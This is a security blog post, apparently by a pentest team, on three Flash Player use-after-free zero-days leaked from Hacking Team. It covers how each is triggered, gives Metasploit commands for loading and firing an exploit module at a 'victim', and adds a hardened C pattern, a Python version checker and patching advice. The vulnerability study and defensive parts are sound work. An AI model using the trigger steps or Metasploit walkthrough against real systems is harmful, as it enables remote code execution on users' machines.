Hacking Team is a Milan-based information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations. Its “Remote Control Systems” enable governments and corporations to monitor the communications of internet users, decipher their encrypted files and emails, record Skype and other Voice over IP communications, and remotely activate microphones and cameras on target computers. Hacking Team states that it has the ability to disable its software if it is used unethically.
The recent cyber attack that exposed 400 GB of data belonging to Hacking Team revealed the following zero-day vulnerabilities in Adobe Flash Player among the leaked data.
Let us see in detail how these vulnerabilities affect Adobe Flash Player.
The first Flash vulnerability (CVE-2015-5119), dubbed the “most beautiful Flash bug for the last four years” in Hacking Team’s internal notes, is a use-after-free vulnerability in the ByteArray class of the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
The second critical zero-day vulnerability in Adobe Flash is a use-after-free programming flaw (CVE-2015-5122), similar to CVE-2015-5119.
This use-after-free vulnerability is present in the DisplayObject class of the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x on Windows and OS X, 14.x through 18.0.0.203 on Windows and OS X, 11.x through 11.2.202.481 on Linux, and 12.x through 18.0.0.204 on Linux Chrome installations. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that leverages improper handling of the opaqueBackground property.
“Successful exploitation [of CVE-2015-5122 flaw] could cause a crash and potentially allow an attacker to take control of the affected system,” Adobe said.
Adobe credited FireEye researcher Dhanesh Kizhakkinan for reporting the vulnerability found in stolen data leaked from Hacking Team.
The flaw can be exploited by freeing a TextLine object within the valueOf function of a custom class when setting the TextLine’s opaqueBackground. As explained by FireEye researchers:
“Once the TextLine object is freed, a Vector object is allocated in its place. Returning from valueOf will overwrite the length field of Vector object with a value of 106. (Initial length is 98).
Exploitation continues by finding the corrupted Vector object by its length, which will be greater than 100.
This enables the object to change an adjacent Vector object’s length to 0x40000000.
Once the exploit achieves this, it follows the same mechanism that was used in the CVE-2015-5119 PoC.”
This, in turn, allows attackers to execute shellcode, which in the proof of concept simply pops up a calculator.
A third use-after-free vulnerability is present in the BitmapData class of the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.302 on Windows and OS X, 14.x through 18.0.0.203 on Windows and OS X, 11.x through 11.2.202.481 on Linux, and 12.x through 18.0.0.204 on Linux Chrome installations. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
The vulnerability can be triggered by the following steps:
1) From a new BitmapData object, prepare two Array objects, create two MyClass objects, and assign a MyClass object to each Array.
2) With the valueOf function of MyClass overridden, call BitmapData.paletteMap with the two Array objects as parameters. BitmapData.paletteMap will trigger the valueOf function.
3) Inside the valueOf function, call BitmapData.dispose() to free the underlying memory of the BitmapData object while paletteMap is still operating on it, thus causing Flash Player to crash.
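The re-entrancy pattern behind this trigger sequence, as an added example that is not from the original post or from Adobe's code: a hypothetical C model of a native method that, like BitmapData.paletteMap, coerces script arguments through a user-overridable valueOf that may call dispose() on the very object being operated on. The names BitmapData, ScriptValue, palette_map_safe and the two valueOf helpers are assumptions for illustration; the hardened ordering shown (coerce every argument first, then re-validate the object before touching its memory) is the general mitigation for this bug class, not Adobe's actual patch.

```c
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical model of the native BitmapData object described above. */
typedef struct {
    uint8_t *pixels;   /* backing store; NULL once dispose() has run */
    size_t   len;
} BitmapData;

/* A script value whose coercion to a number may run arbitrary AS3 (valueOf). */
typedef struct {
    int  (*value_of)(void *ctx);  /* user-overridable valueOf */
    void  *ctx;
} ScriptValue;

BitmapData *bitmap_new(size_t len) {
    BitmapData *b = calloc(1, sizeof *b);
    if (!b) return NULL;
    b->pixels = calloc(len, 1);
    b->len = b->pixels ? len : 0;
    return b;
}

/* BitmapData.dispose(): releases the pixel memory, as in step 3 above. */
void bitmap_dispose(BitmapData *b) {
    free(b->pixels);
    b->pixels = NULL;
    b->len = 0;
}

/* Hardened shape of a paletteMap-like method: 0 on success, -1 if a callback
 * disposed the object. The vulnerable ordering shared by the bugs above is:
 * read b->pixels, THEN coerce arguments (running valueOf), THEN write through
 * the now-stale pointer. Here all coercion happens first and the object is
 * re-validated before any memory is touched. */
int palette_map_safe(BitmapData *b, ScriptValue *args, size_t nargs) {
    int sum = 0;
    for (size_t i = 0; i < nargs; i++)          /* step 1: coerce everything up front */
        sum += args[i].value_of(args[i].ctx);    /* may call bitmap_dispose(b) */
    if (!b->pixels || b->len == 0)              /* step 2: re-validate after re-entry */
        return -1;
    for (size_t i = 0; i < b->len; i++)         /* step 3: only now touch the buffer */
        b->pixels[i] = (uint8_t)(b->pixels[i] + sum);
    return 0;
}

/* Test helpers: a benign valueOf, and one that disposes the bitmap mid-call. */
int value_of_plain(void *ctx)   { (void)ctx; return 1; }
int value_of_dispose(void *ctx) { bitmap_dispose((BitmapData *)ctx); return 1; }
```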
Steps to exploit the Flash zero-day vulnerability with Metasploit:
Note: This tutorial is for informational purposes only.
Adobe_Flash_HackingTeam_exploit.rb
Figure 2: Download the exploit
/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf
Use the following command to move the file from /root/Desktop to the Metasploit Framework modules folder (create the flash folder if it does not exist):
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/
Figure 3: Move the exploit into the exploit modules folder
ls /usr/share/metasploit-framework/modules/exploits/windows/flash/
Figure 4: Confirm the destination folder
service postgresql start
service metasploit start
msfconsole
Figure 5: Start msfconsole
search hackingteam
After this, use the following command to load the newly added exploit module (the module name must match the file name):
use exploit/windows/flash/Adobe_Flash_HackingTeam_exploit
Let’s check the options for the Metasploit CVE-2015-5122 module with the following command:
show options
exploit
Figure 7: Send the Link to the victim
Countermeasures:
How to avoid getting infected by these exploits:
– Update Flash Player and make sure that it is up-to-date: https://get.adobe.com/flashplayer/
  If you’re unsure whether your browser has Flash installed or what version it is running, you can browse to this link: https://www.adobe.com/software/flash/about/
– Install security patches if any and keep your OS updated.
– Keep your browser updated.
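As an added example (not part of the original post), a small Python check that compares a reported Flash Player build against the affected version ranges quoted in the CVE descriptions above, useful when sweeping an inventory for hosts still running vulnerable builds. The platform keys and the label "BitmapData-UAF" for the third issue are my own, since the post does not give its CVE id; the "13.x on Windows and OS X" entry for CVE-2015-5122 is left out because the post states no upper bound for it.

```python
"""Compare a Flash Player build against the affected ranges quoted in the post."""
from typing import Dict, List, Tuple

Version = Tuple[int, int, int, int]


def parse_version(text: str) -> Version:
    """'18.0.0.194' -> (18, 0, 0, 194); shorter strings are zero-padded so
    tuples compare component-wise (13 < 13.0.0.296 < 14)."""
    parts = [int(p) for p in text.strip().split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"unexpected Flash version string: {text!r}")
    parts += [0] * (4 - len(parts))
    return (parts[0], parts[1], parts[2], parts[3])


# Ranges copied from the CVE descriptions in the post:
# (platform key, lowest affected major version, highest affected build).
# Platform keys are my own shorthand; "BitmapData-UAF" is my label for the
# third issue, whose CVE id the post does not give.
AFFECTED: Dict[str, List[Tuple[str, int, str]]] = {
    "CVE-2015-5119": [("win_mac", 13, "13.0.0.296"),
                      ("win_mac", 14, "18.0.0.194"),
                      ("linux", 11, "11.2.202.468")],
    "CVE-2015-5122": [("win_mac", 14, "18.0.0.203"),
                      ("linux", 11, "11.2.202.481"),
                      ("linux_chrome", 12, "18.0.0.204")],
    "BitmapData-UAF": [("win_mac", 13, "13.0.0.302"),
                       ("win_mac", 14, "18.0.0.203"),
                       ("linux", 11, "11.2.202.481"),
                       ("linux_chrome", 12, "18.0.0.204")],
}


def affected_issues(version: str, platform: str) -> List[str]:
    """Return the issues whose quoted range covers this build on this platform."""
    build = parse_version(version)
    hits = []
    for issue, ranges in AFFECTED.items():
        for plat, low_major, high in ranges:
            if plat == platform and low_major <= build[0] and build <= parse_version(high):
                hits.append(issue)
                break  # one matching range per issue is enough
    return hits


if __name__ == "__main__":
    # Constructed sample inventory: (host, platform key, reported build)
    inventory = [("ws01", "win_mac", "18.0.0.194"), ("ws02", "win_mac", "18.0.0.209"),
                 ("srv03", "linux", "11.2.202.481")]
    for host, plat, ver in inventory:
        print(host, ver, affected_issues(ver, plat) or "no quoted range matches")
```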
References:
https://cve.mitre.org/cgi-bin/cvename.cgi
https://www.adobe.com/software/flash/about/
Author:
Attack & PenTest Team,
Varutra Consulting